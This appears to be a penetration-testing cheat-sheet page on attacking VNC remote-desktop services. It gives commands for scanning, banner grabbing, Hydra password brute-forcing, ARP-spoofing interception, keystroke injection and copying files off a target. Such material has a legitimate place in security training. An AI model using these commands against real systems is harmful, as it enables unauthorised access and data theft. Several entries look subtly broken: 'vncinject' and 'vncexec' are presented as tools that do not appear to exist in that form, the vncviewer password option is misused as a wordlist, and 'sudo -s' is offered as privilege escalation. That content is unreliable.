Skip to main content

Want to Practice These Techniques?

Try Hackviser's interactive cyber security upskilling platform - Learn by doing!

Start Practicing Now

VNC (Virtual Network Computing)

Default Ports: 5900,5901

VNC (Virtual Network Computing) is a graphical desktop-sharing system that allows users to remotely control another computer's desktop over a network connection. It is widely used for remote administration, support, and screen sharing.

VNC operates on a client-server architecture, where the VNC server runs on the remote computer and the VNC client software is used to access and interact with the remote desktop.

Connect

Connect Using VNC Viewer

VNC Viewer is a popular client software used to connect to VNC servers:

vncviewer <target-ip>:<port>

Connect Using Remmina

Remmina is another remote desktop client that supports VNC connections:

remmina

Recon

Nmap Scan

You can use Nmap to scan for open VNC ports on a target host:

nmap -p 5900,5901 <target-ip>

Banner grabbing can be performed using tools like Netcat to identify VNC services and their versions:

nc -nv <target-ip> 5900

Enumeration

Default Authentication

VNC servers often use default or weak credentials. Enumeration involves trying common username-password combinations:

vncviewer -passwd passwords.txt <target-ip>

Attack Vectors

Weak Authentication

Exploiting weak or default credentials is a common attack vector. Tools like Hydra can be used for brute-forcing VNC passwords:

hydra -V -f -L users.txt -P passwords.txt vnc://<target-ip>

Man-in-the-Middle (MITM) Attacks

MITM attacks can intercept VNC traffic and manipulate data exchanged between the client and server:

arpspoof -i <interface> -t <target-ip> <gateway-ip>

VNC Injection

Attackers can inject keystrokes and mouse movements into VNC sessions to gain control over the remote desktop:

vncinject <target-ip>

Post-Exploitation

Remote Code Execution (RCE)

Successful exploitation may lead to remote code execution, allowing attackers to execute arbitrary commands on the target system:

vncexec <target-ip> ls -la

Data Exfiltration

Attackers can exfiltrate sensitive data from the remote desktop:

scp user@<target-ip>:/path/to/file /local/path

Privilege Escalation

Exploiting vulnerabilities in the VNC server software or the underlying operating system can lead to privilege escalation:

sudo -s